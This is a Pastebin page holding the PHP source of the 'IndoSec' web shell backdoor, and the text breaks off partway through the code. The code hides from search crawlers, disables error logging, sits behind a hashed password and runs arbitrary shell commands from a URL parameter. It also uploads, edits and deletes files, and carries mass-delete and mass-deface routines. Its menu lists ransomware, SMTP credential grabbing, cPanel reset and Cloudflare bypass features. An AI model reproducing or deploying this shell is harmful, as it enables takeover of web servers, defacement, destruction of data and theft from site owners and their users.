RokiAdhytama

Shell Backdoor by IndoSec

Jun 10th, 2019
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 65.64 KB | None | 0 0
  1. <?php
  2. /*
  3. * Konsep Shell : Brillyan -Founder { IndoSec }-
  4. * Pembuat : Holiq -Member { IndoSec }-
  5.  
  6. * Re-Code Boleh Asal Dah Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Fix Lo Noob Anjenk, Klo Kga Bisa Bikin Cek
  7. * Chanel IndoSec, Ada Tutornya, Jangan Cuma Bisa Ganti Author Doank Bangsad
  8.  
  9. * Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell,Dan Dari Shell Lain Untuk Inspirasinya
  10.  
  11. * { IndoSec sHell } v2 Gan
  12. * Untuk Tools Yang Lain Akan Ditambahkan DiVersi Berikutnya..
  13. * ©2019 { IndoSec } -Holiq-
  14. */
  15. session_start();
  16. error_reporting(0);
  17. set_time_limit(0);
  18. @clearstatcache();
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @ini_set('output_buffering',0);
  23. @ini_set('display_errors', 0);
  24.  
  25. /* Configurasi */
  26. $auth_pass = "54062f3bf6377d42b4fab7c8fedfc7da"; // IndoSec
  27. $color = "#00ff00";
  28. $default_action = 'FilesMan';
  29. $default_use_ajax = true;
  30. $default_charset = 'UTF-8';
  31.  
  32. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  33. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  34. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  35. header('HTTP/1.0 404 Not Found');
  36. exit;
  37. }
  38. }
  39.  
  40. function login_shell() {
  41. ?>
  42. <!DOCTYPE html>
  43. <html>
  44. <title>{ IndoSec sHell }</title>
  45. <head>
  46. <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
  47. <meta name="author" content="Holiq"/>
  48. <link rel='icon' type='image/png' href='https://www.indsc.me/images/logo.png'/>
  49. <meta name="copyright" content="{ IndoSec }"/>
  50. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
  51. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
  52. </head>
  53. <body class="bg-dark text-light">
  54. <center>
  55. <div class="container" style="margin-top: 15%">
  56. <div class="col-lg-6">
  57. <div class="form-group">
  58. <h1 class='text-center'>
  59. <a href='https://facebook.com/IndoSecOfficial' style='color:#ffffff;'>{ INDOSEC }
  60. </h1>
  61. <center><h5>Shell Backdor</a></h5></center>
  62. <form method="post">
  63. <input type="password" name="pass" placeholder="USER ID" class="form-control"><br/>
  64. <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
  65. </form>
  66. </div>
  67. </div><br/><p style="opacity: 0.3;"><a href="https://facebook.com/IndoSecOfficial" style="color: white;">Copyright 2019 @ { IndoSec }</a></p><br/>
  68. </div>
  69. </center>
  70. </body>
  71. </html>
  72.  
  73. <?php
  74. exit;
  75. }
  76. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  77. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  78. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  79. else
  80. login_shell();
  81. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  82. @ob_clean();
  83. $file = $_GET['file'];
  84. header('Content-Description: File Transfer');
  85. header('Content-Type: application/octet-stream');
  86. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  87. header('Expires: 0');
  88. header('Cache-Control: must-revalidate');
  89. header('Pragma: public');
  90. header('Content-Length: ' . filesize($file));
  91. readfile($file);
  92. exit;
  93. }
  94. ?>
  95. <?php
  96. function w($dir,$perm) {
  97. if(!is_writable($dir)) {
  98. return "<font color=red>".$perm."</font>";
  99. } else {
  100. return "<font color=lime>".$perm."</font>";
  101. }
  102. }
  103. function r($dir,$perm) {
  104. if(!is_readable($dir)) {
  105. return "<font color=red>".$perm."</font>";
  106. } else {
  107. return "<font color=lime>".$perm."</font>";
  108. }
  109. }
  110.  
  111. function exe($cmd) {
  112. if(function_exists('system')) {
  113. @ob_start();
  114. @system($cmd);
  115. $buff = @ob_get_contents();
  116. @ob_end_clean();
  117. return $buff;
  118. } elseif(function_exists('exec')) {
  119. @exec($cmd,$results);
  120. $buff = "";
  121. foreach($results as $result) {
  122. $buff .= $result;
  123. } return $buff;
  124. } elseif(function_exists('passthru')) {
  125. @ob_start();
  126. @passthru($cmd);
  127. $buff = @ob_get_contents();
  128. @ob_end_clean();
  129. return $buff;
  130. } elseif(function_exists('shell_exec')) {
  131. $buff = @shell_exec($cmd);
  132. return $buff;
  133. }
  134. }
  135.  
  136. function perms($file){
  137. $perms = fileperms($file);
  138.  
  139. if (($perms & 0xC000) == 0xC000) {
  140. // Socket
  141. $info = 's';
  142. } elseif (($perms & 0xA000) == 0xA000) {
  143. // Symbolic Link
  144. $info = 'l';
  145. } elseif (($perms & 0x8000) == 0x8000) {
  146. // Regular
  147. $info = '-';
  148. } elseif (($perms & 0x6000) == 0x6000) {
  149. // Block special
  150. $info = 'b';
  151. } elseif (($perms & 0x4000) == 0x4000) {
  152. // Directory
  153. $info = 'd';
  154. } elseif (($perms & 0x2000) == 0x2000) {
  155. // Character special
  156. $info = 'c';
  157. } elseif (($perms & 0x1000) == 0x1000) {
  158. // FIFO pipe
  159. $info = 'p';
  160. } else {
  161. // Unknown
  162. $info = 'u';
  163. }
  164.  
  165. // Owner
  166. $info .= (($perms & 0x0100) ? 'r' : '-');
  167. $info .= (($perms & 0x0080) ? 'w' : '-');
  168. $info .= (($perms & 0x0040) ?
  169. (($perms & 0x0800) ? 's' : 'x' ) :
  170. (($perms & 0x0800) ? 'S' : '-'));
  171. // Group
  172. $info .= (($perms & 0x0020) ? 'r' : '-');
  173. $info .= (($perms & 0x0010) ? 'w' : '-');
  174. $info .= (($perms & 0x0008) ?
  175. (($perms & 0x0400) ? 's' : 'x' ) :
  176. (($perms & 0x0400) ? 'S' : '-'));
  177.  
  178. // World
  179. $info .= (($perms & 0x0004) ? 'r' : '-');
  180. $info .= (($perms & 0x0002) ? 'w' : '-');
  181. $info .= (($perms & 0x0001) ?
  182. (($perms & 0x0200) ? 't' : 'x' ) :
  183. (($perms & 0x0200) ? 'T' : '-'));
  184.  
  185. return $info;
  186. }
  187.  
  188.  
  189. if(isset($_GET['path'])){
  190. $path = $_GET['path'];
  191. chdir($path);
  192. }else{
  193. $path = getcwd();
  194. }
  195. $path = str_replace('\\','/',$path);
  196. $paths = explode('/',$path);
  197. if(isset($_GET['dir'])) {
  198. $dir = $_GET['dir'];
  199. chdir($dir);
  200. } else {
  201. $dir = getcwd();
  202. }
  203. $os = php_uname();
  204. $ip = getHostByName(getHostName());
  205. $ver = phpversion();
  206. $dom = $_SERVER['HTTP_HOST'];
  207. $dir = str_replace("\\","/",$dir);
  208. $scdir = explode("/", $dir);
  209. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  210. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  211. $total = formatSize(disk_total_space($path));
  212. $free = formatSize(disk_free_space($path));
  213. $total1 = disk_total_space($path);
  214. $free1 = disk_free_space($path);
  215. $used = formatSize($total1 - $free1);
  216. function formatSize( $bytes ) {
  217. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
  218. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
  219. return( round( $bytes, 2 ) . " " . $types[$i] );
  220. }
  221.  
  222. function ambilKata($param, $kata1, $kata2){
  223. if(strpos($param, $kata1) === FALSE) return FALSE;
  224. if(strpos($param, $kata2) === FALSE) return FALSE;
  225. $start = strpos($param, $kata1) + strlen($kata1);
  226. $end = strpos($param, $kata2, $start);
  227. $return = substr($param, $start, $end - $start);
  228. return $return;
  229. }
  230.  
  231. echo "
  232. <html>
  233. <title>{ Simpel sHell }</title>
  234. <head>
  235. <meta name='viewport' content='widht=device-widht, initial-scale=1'>
  236. <link rel='icon' type='image/png' href='https://www.indsc.me/images/logo.png'/>
  237. <meta name='author' content='Holiq'/>
  238. <meta name='copyright' content='{ IndoSec }'/>
  239. <link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css'>
  240. <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.2/css/all.css' >
  241. <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'>
  242. <script src='https://code.jquery.com/jquery-3.3.1.js'></script>
  243. <script src='https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js'></script>
  244. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
  245. </head>
  246. <body class='bg-dark text-light'>
  247. <script>
  248. $(document).ready(function(){
  249. $(window).scroll(function(){
  250. if ($(this).scrollTop() > 700) {
  251. $('.scrollToTop').fadeIn();
  252. }else{
  253. $('.scrollToTop').fadeOut();
  254. }
  255. });
  256. $('.scrollToTop').click(function(){
  257. $('html, body').animate({scrollTop : 0},1000);
  258. return false;
  259. });
  260. });
  261. </script>
  262. <style>
  263. @import url(https://fonts.googleapis.com/css?family=Lato);
  264. body{margin:0;padding:0;font-family:'Lato';}
  265. #tab table thead th{padding:5px;font-size:16px;}
  266. #tab tr {border-bottom:1px solid #fff;}
  267. #tab tr:hover{background:#5B6F7D; color:#fff;}
  268. #tab tr td{padding:5px;}
  269. #tab tr td .badge{font-size:13px;}
  270. a {font-family:'Quicksand';color:white;}
  271. a:hover{color:dodgerBlue;}
  272. .ico {width:25px;}
  273. .ico2{width:30px;}
  274. .scrollToTop{
  275. position:fixed;
  276. bottom:30px;
  277. right:30px;
  278. width:35px;
  279. height:35px;
  280. background:#262626;
  281. color:#fff;
  282. border-radius:15%;
  283. text-align:center;
  284. opacity:.5;
  285. }
  286. .scrollToTop:hover{color:#fff;}
  287. .up{font-size:20px;line-height:35px;}
  288. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
  289. .lain:hover{color:#fff;}
  290. .tambah{
  291. width:35px;
  292. height:35px;
  293. line-height:35px;
  294. border:1px solid;
  295. border-radius:50%;
  296. text-align:center;
  297. }
  298. .fiture{margin:2px;}
  299. .tmp{background:#F4F4F4;color:rgb(153,153,153);}
  300. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;}
  301. .about{color:#000;}
  302. .about .card-body .img{
  303. position: relative;
  304. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
  305. background-size: cover;
  306. width: 150px;
  307. height: 150px;
  308. }
  309. .butn {
  310. position: relative;
  311. text-align: center;
  312. padding: 3px;
  313. background:rgba(225,225,225,.3);
  314. -webkit-transition: background 300ms ease, color 300ms ease;
  315. transition: background 300ms ease, color 300ms ease;
  316. }
  317. input[type='radio'].toggle {
  318. display: none;
  319. }
  320. input[type='radio'].toggle + label {
  321. cursor: pointer;
  322. margin: 0 2px;
  323. width: 60px;
  324. }
  325. input[type='radio'].toggle + label:after {
  326. position: absolute;
  327. content: '';
  328. top: 0;
  329. background: #fff;
  330. height: 100%;
  331. width: 100%;
  332. z-index: -1;
  333. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  334. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  335. }
  336. input[type='radio'].toggle.toggle-left + label:after {
  337. left: 100%;
  338. }
  339. input[type='radio'].toggle.toggle-right + label {
  340. margin-left: -5px;
  341. }
  342. input[type='radio'].toggle.toggle-right + label:after {
  343. left: -100%;
  344. }
  345. input[type='radio'].toggle:checked + label {
  346. cursor: default;
  347. color: #000;
  348. -webkit-transition: color 400ms;
  349. transition: color 400ms;
  350. }
  351. input[type='radio'].toggle:checked + label:after {
  352. left: 0;
  353. }
  354. </style>
  355. <nav class='navbar static-top navbar-dark'>
  356. <button class='navbar-toggler'type='button' data-toggle='collapse' data-target='#info' aria-label='Toggle navigation'>
  357. <i style='color:#fff;' class='fa fa-navicon'></i>
  358. </button>
  359. <div class='collapse navbar-collapse' id='info'>
  360. <ul>
  361. <a href='https://facebook.com/IndoSecOfficial' class='lain'><i class='fa fa-facebook tambah'></i></a>
  362. <a href='https://www.instagram.com/indosec.id' class='lain'><i class='fa fa-instagram tambah'></i></a>
  363. <a href='https://www.youtube.com/IndoSec' class='lain'><i class='fa fa-youtube-play tambah'></i></a>
  364. <a href='https://github.com/indosecid' class='lain'><i class='fa fa-github tambah'></i></a>
  365. <a href='https://indosec.web.id' class='lain'><i class='fa fa-globe tambah'></i></a>
  366. </ul>
  367. </div>
  368. </nav>
  369. <div class='container'>
  370. <h1 class='text-center'><a href='https://facebook.com/IndoSecOfficial' style='color:#ffffff;'>{ INDOSEC }</h1>
  371. <center><h5>Shell Backdor</a></h5></center>
  372. <hr/>
  373. <div class='text-center'>
  374. <div class='d-flex justify-content-center flex-wrap'>
  375. <a href='?' class='fiture btn btn-danger btn-sm'><i class='fa fa-home'></i> Home</a>
  376. <a href='?dir=$dir&aksi=upload' class='fiture btn btn-danger btn-sm'><i class='fa fa-upload'></i> Upload</a>
  377. <a href='?dir=$dir&aksi=buat_file' class='fiture btn btn-danger btn-sm'><i class='fa fa-plus-circle'></i> Buat File</a>
  378. <a href='?dir=$dir&aksi=buat_folder' class='fiture btn btn-danger btn-sm'><i class='fa fa-plus'></i> Buat Folder</a>
  379. <a href='?dir=$dir&aksi=masdef' class='fiture btn btn-danger btn-sm'><i class='fa fa-exclamation-triangle'></i> Mass Deface</a>
  380. <a href='?dir=$dir&aksi=masdel' class='fiture btn btn-danger btn-sm'><i class='fa fa-trash'></i> Mass Delete</a>
  381. <a href='?dir=$dir&aksi=jumping' class='fiture btn btn-danger btn-sm'><i class='fa fa-exclamation-triangle'></i> Jumping</a>
  382. <a href='?dir=$dir&aksi=config' class='fiture btn btn-danger btn-sm'><i class='fa fa-cogs'></i> Config</a>
  383. <a href='?dir=$dir&aksi=adminer' class='fiture btn btn-danger btn-sm'><i class='fa fa-user'></i> Adminer</a>
  384. <a href='?dir=$dir&aksi=symlink' class='fiture btn btn-danger btn-sm'><i class='fa fa-exclamation-circle'></i> Symlink</a>
  385. <a href='?dir=$dir&aksi=resetpasscp' class='fiture btn btn-warning btn-sm'><i class='fa fa-key'></i> Auto Reset Cpanel</a>
  386. <a href='?dir=$dir&aksi=ransom' class='fiture btn btn-warning btn-sm'><i class='fab fa-keycdn'></i> Ransomware</a>
  387. <a href='?dir=$dir&aksi=smtpgrab' class='fiture btn btn-warning btn-sm'><i class='fas fa fa-exclamation-circle'></i> SMTP Grabber</a>
  388. <a href='?dir=$dir&aksi=bypascf' class='fiture btn btn-warning btn-sm'><i class='fas fa-cloud'></i> Bypass Cloud Flare</a>
  389. <a href='?about' class='fiture btn btn-warning btn-sm'><i class='fa fa-info'></i> About Us</a>
  390. <a href='?keluar' class='fiture btn btn-warning btn-sm'><i class='fa fa-sign-out'></i> keluar</a>
  391. </div>
  392. </div>
  393. <div class='row'>
  394. <div class='col-lg-4'><br/>
  395. <h5><i class='fa fa-terminal'></i>Terminal : </h5>
  396. <form>
  397. <input type='text' class='form-control' name='cmd' placeholder='id | uname -a | whoami | heked'>
  398. </form>
  399. <hr style='backgroud: white'/>
  400. <h5><i class='fa fa-search'></i> Informasi : </h5>
  401. <div class='card table-responsive infor'>
  402. <div class='card-body' style='color: #333'>
  403. <table class='table' style='color: #333'>
  404. <tr>
  405. <td>PHP V.</td>
  406. <td> : $ver</td>
  407. </tr>
  408. <tr>
  409. <td>IP Server</td>
  410. <td> : $ip</td>
  411. </tr>
  412. <tr>
  413. <td>HDD</td>
  414. <td>Total : $total Free : $free [$used]</td>
  415. </tr>
  416. <tr>
  417. <td>Doamin Web</td>
  418. <td>: $dom</td>
  419. </tr>
  420. <tr>
  421. <td>MySQL</td>
  422. <td>: $mysql</td>
  423. </tr>
  424. <tr>
  425. <td>CURL</td>
  426. <td>: $curl</td>
  427. </tr>
  428. <tr>
  429. <td>Sistem Operasi</td>
  430. <td> : $os</td>
  431. </tr>
  432. </table>
  433. </div>
  434. </div>
  435. </div>
  436. <div class='col-lg-8'><hr/>";
  437.  
  438.  
  439. //cmd
  440. if(isset($_GET['cmd'])){
  441. echo "<pre class='text-white'>";
  442. echo system($_GET['cmd']);
  443. echo "</pre>";
  444. exit;
  445. }
  446.  
  447.  
  448. //keluar
  449. if (isset($_GET['keluar'])) {
  450. session_start();
  451. session_destroy();
  452. echo '<script>window.location="?";</script>';
  453. }
  454.  
  455.  
  456. if (isset($_GET['about'])) {
  457. echo '<div class="card text-center bg-light about">
  458. <h4 class="card-header">{ IndoSec }</h4>
  459. <div class="card-body">
  460. <center><div class="img"></div></center>
  461. <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
  462. </div>
  463. <div class="card-footer">
  464. <p class="card-text"><small class="text-muted">Copyright 2019 { IndoSec }</small></p>
  465. </div>
  466. </div><br/>';
  467. exit;
  468. }
  469.  
  470.  
  471. //upload
  472. if ($_GET['aksi'] == 'upload') {
  473. echo
  474. "<form method='POST' enctype='multipart/form-data' name='uploader' id='uploader'>
  475. <div class='form-group'>
  476. <label>Upload File: </label><br>
  477. <input class='' type='file' name='file'>
  478. </div>
  479. <div class='form-group'>
  480. <input class='btn btn-primary btn-sm' type='submit' value='Upload'>
  481. </div>
  482. </form>";
  483.  
  484. if(isset($_FILES['file'])){
  485. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  486. echo '<script>window.location="?dir='.$path.'"; alert("Upload Berhasil");</script>';
  487. }else{
  488. echo '<script>alert("Gagal Upload!!!");</script>';
  489. }
  490. }
  491. }
  492.  
  493. //openfile
  494. if (isset($_GET['dirf'])) {
  495. $file = $_GET['dirf'];
  496. }
  497.  
  498. //buat_file
  499. if ($_GET['aksi'] == 'buat_file') {
  500.  
  501. $output = "
  502. <h4>
  503. <img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File:
  504. </h4>
  505. <form method='POST'>
  506. <input type='text' class='form-control' name='nama_file' placeholder='Nama File...'><br/>
  507. <textarea name='isi_file' class='form-control' rows='3' placeholder='Isi File...'></textarea><br/>
  508. <button type='sumbit' class='btn btn-info btn-block' name='bikin'>Bikin!!</button><br/>
  509. </form>";
  510. echo $output;
  511.  
  512. if (isset($_POST['bikin'])) {
  513. $nama_file = $_POST['nama_file'];
  514. $isi_file = $_POST['isi_file'];
  515. $handle = fopen("$nama_file", "w");
  516.  
  517. if (fwrite($handle, $isi_file)) {
  518. echo '<script>window.location="?dir='.$dir.'"; alert("Buat File Berhasil");</script>';
  519. }else{
  520. echo '<script>("File Gagal Dibuat");</script>';
  521. }
  522. }
  523. }
  524.  
  525. /*
  526. View
  527. */
  528. if($_GET['aksi'] == 'view') {
  529. echo '[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ] [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]';
  530. echo "
  531. <textarea rows='8' class='form-control' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>
  532. <br/><br/>";
  533. }
  534.  
  535. /*
  536. Edit
  537. */
  538. if($_GET['aksi'] == 'edit') {
  539. $nama = basename($file);
  540. echo '[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ] [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]<hr/><i class="fa fa-edit"> <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Rename</a>';
  541. echo "<form method='POST'>
  542. <h5><i class='fa fa-file'></i> Edit File : $nama</h5>
  543. <textarea rows='7' class='form-control' name='isi'>".htmlspecialchars(file_get_contents($file))."</textarea><br/>
  544. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>
  545. </form><br/>";
  546.  
  547. if(isset($_POST['edit_file'])) {
  548. $updt = fopen("$file", "w");
  549. $hasil = fwrite($updt, $_POST['isi']);
  550.  
  551. if ($hasil) {
  552. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Update!!");</script>';
  553. }else{
  554. echo '<script>alert("Gagal Update!!");</script>';
  555. }
  556. }
  557. }
  558.  
  559. /*
  560. Rename
  561. */
  562. if($_GET['aksi'] == 'rename') {
  563. $nama = basename($file);
  564. echo '[ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Kembali</a> ]';
  565. echo "<form method='POST'>
  566. <h5><i class='fa fa-file'></i> Rename File : $nama</h5>
  567. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
  568. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button><br/>
  569. </form><br/>";
  570.  
  571. if(isset($_POST['rename_file'])) {
  572. $lama = $file;
  573. $baru = $_POST['namanew'];
  574. rename( $baru, $lama);
  575. if(file_exists($baru)) {
  576. echo '<script>alert("Nama '.$baru.' Telah Digunakan");</script>';
  577. }else{
  578. if(rename( $lama, $baru)) {
  579. echo '<script>window.location="?dir='.$dir.'"; alert("Sukses Mengganti Nama Menjadi '.$baru.'");</script>';
  580. }else{
  581. echo '<script>alert("Gagal Mengganti Nama");</script>';
  582. }
  583. }
  584. }
  585. }
  586.  
  587. /*
  588. Delete File
  589. */
  590. if ($_GET['aksi'] == 'hapusf') {
  591. $nama = basename($file);
  592. echo '[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ] [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]';
  593. $output ="
  594. <div class='card card-body'>
  595. <center><br/>
  596. <font color='black'>Yakin Menghapus : $nama
  597. </center><br/><br/>
  598. <form method='POST'>
  599. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
  600. <input type='submit' name='ya' class='float-right btn btn-success btn-success btn-block' value='Ya'>
  601. </form>
  602. </div><br/>";
  603. echo $output;
  604.  
  605. if ($_POST['ya']) {
  606. $hapus = unlink($file);
  607. if ($hapus) {
  608. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Menghapus File");</script>';
  609. }else{
  610. echo '<script>alert("Gagal Menghapus File!");</script>';
  611. }
  612. }
  613. }
  614.  
  615. /*
  616. Add Folder
  617. */
  618. if ($_GET['aksi'] == 'buat_folder' ) {
  619. $output = "
  620. <h4><img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img></i> Buat Folder: </h4>
  621. <form method='POST'>
  622. <input type='text' class='form-control' name='nama_folder' placeholder='Nama Folder...'><br/>
  623. <button type='sumbit' class='btn btn-info btn-block' name='buat'>Buat!!</button><br/>
  624. </form>";
  625. echo $output;
  626.  
  627. if (isset($_POST['buat'])) {
  628. $nama_folder = $_POST['nama_folder'];
  629. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]);
  630. $fd = mkdir ($folder);
  631. if ($fd) {
  632. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Membuat Folder");</script>';
  633. }else{
  634. echo "echo '<script> alert('Folder ".$folder." Gagal Dibuat');</script>";
  635. }
  636. }
  637. }
  638.  
  639. /*
  640. Delete Folder
  641. */
  642. if ($_GET['aksi'] == 'hapus_folder' ) {
  643. $nama = basename(getcwd());
  644. $output ="
  645. [ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]
  646. <div class='card container'>
  647. <center><br/>
  648. <font color='black'>Apakah Yakin Menghapus : $nama ?
  649. </center><br/><br/>
  650. <form method='POST'>
  651. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
  652. <input type='submit' name='ya' class='float-right btn btn-success btn-block' value=' Ya '>
  653. </form><br/><br/>
  654. </div><br/>";
  655. echo $output;
  656.  
  657. if ($_POST['ya']) {
  658. if(is_dir($dir)) {
  659. if(is_writable($dir)) {
  660. @rmdir($dir);
  661. @exe("rm -rf $dir");
  662. @exe("rmdir /s /q $dir");
  663. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Menghapus Folder');</script>";
  664. } else {
  665. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Tidak Dapat Menghapus Folder');</script>";
  666. }
  667. }
  668. }
  669. exit;
  670. }
  671.  
  672. /*
  673. Rename Folder
  674. */
  675. if ($_GET['aksi'] == 'rename_folder' ) {
  676. $nama = basename(getcwd());
  677. $output="
  678. [ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]
  679. <h4><img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img> Rename Folder : $nama </h4>
  680. <form method='POST'>
  681. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
  682. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
  683. </form>";
  684. echo $output;
  685.  
  686. if (isset($_POST['ganti'])) {
  687. $lama = $dir;
  688. $baru = $_POST['namanew'];
  689. $ubah = rename($lama, $baru);
  690. if($ubah) {
  691. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Mengganti Nama');</script>";
  692. }else{
  693. echo "<script>alert('Gagal Mengganti Nama');</script>" ;
  694. }
  695. }
  696. exit;
  697. }
  698.  
  699. /*
  700. * Fungsi_Tambahan
  701. *
  702. */
  703.  
  704. /*
  705. mass delete
  706. */
  707. if($_GET['aksi'] == 'masdel') {
  708.  
  709. function hapus_massal($dir,$namafile) {
  710. if(is_writable($dir)) {
  711. $dira = scandir($dir);
  712. foreach($dira as $dirb) {
  713. $dirc = "$dir/$dirb";
  714. $lokasi = $dirc.'/'.$namafile;
  715. if($dirb === '.') {
  716. if(file_exists("$dir/$namafile")) {
  717. unlink("$dir/$namafile");
  718. }
  719. } elseif($dirb === '..') {
  720. if(file_exists("".dirname($dir)."/$namafile")) {
  721. unlink("".dirname($dir)."/$namafile");
  722. }
  723. } else {
  724. if(is_dir($dirc)) {
  725. if(is_writable($dirc)) {
  726. if($lokasi) {
  727. echo "$lokasi > Terhapus\n";
  728. unlink($lokasi);
  729. $massdel = hapus_massal($dirc,$namafile);
  730. }
  731. }
  732. }
  733. }
  734. }
  735. }
  736. }
  737.  
  738. if($_POST['start']) {
  739. echo "[ <a href='?dir=$dir'>Kembali</a> ]
  740. <textarea class='form-control' rows='7' disabled=''>";
  741. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  742. echo "</textarea><br/>";
  743. } else {
  744. echo "<form method='post'>
  745. <h5><i class='fa fa-folder'></i> Lokasi :</h5>
  746. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  747. <h5><i class ='fa fa-file'></i> Nama File :</h5>
  748. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br>
  749. <input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
  750. </form>";
  751. }
  752. exit;
  753. }
  754.  
  755.  
  756.  
  757. /*
  758. Mass Deface
  759. */
  760. if($_GET['aksi'] == 'masdef') {
  761.  
  762. function tipe_massal($dir,$namafile,$isi_script) {
  763. if(is_writable($dir)) {
  764. $dira = scandir($dir);
  765. foreach($dira as $dirb) {
  766. $dirc = "$dir/$dirb";
  767. $lokasi = $dirc.'/'.$namafile;
  768. if($dirb === '.') {
  769. file_put_contents($lokasi, $isi_script);
  770. } elseif($dirb === '..') {
  771. file_put_contents($lokasi, $isi_script);
  772. } else {
  773. if(is_dir($dirc)) {
  774. if(is_writable($dirc)) {
  775. echo "Done > $lokasi\n";
  776. file_put_contents($lokasi, $isi_script);
  777. $masdef = tipe_massal($dirc,$namafile,$isi_script);
  778. }
  779. }
  780. }
  781. }
  782. }
  783. }
  784.  
  785. function tipe_biasa($dir,$namafile,$isi_script) {
  786. if(is_writable($dir)) {
  787. $dira = scandir($dir);
  788. foreach($dira as $dirb) {
  789. $dirc = "$dir/$dirb";
  790. $lokasi = $dirc.'/'.$namafile;
  791. if($dirb === '.') {
  792. file_put_contents($lokasi, $isi_script);
  793. } elseif($dirb === '..') {
  794. file_put_contents($lokasi, $isi_script);
  795. } else {
  796. if(is_dir($dirc)) {
  797. if(is_writable($dirc)) {
  798. echo "Done > $dirb/$namafile\n";
  799. file_put_contents($lokasi, $isi_script);
  800. }
  801. }
  802. }
  803. }
  804. }
  805. }
  806.  
  807. if($_POST['start']) {
  808. echo "[ <a href='?dir=$dir'>Kembali</a> ]
  809. <textarea class='form-control' rows='7' disabled=''>";
  810. if($_POST['tipe'] == 'mahal') {
  811. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  812. } elseif($_POST['tipe'] == 'murah') {
  813. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  814. }
  815. echo "</textarea><br/>";
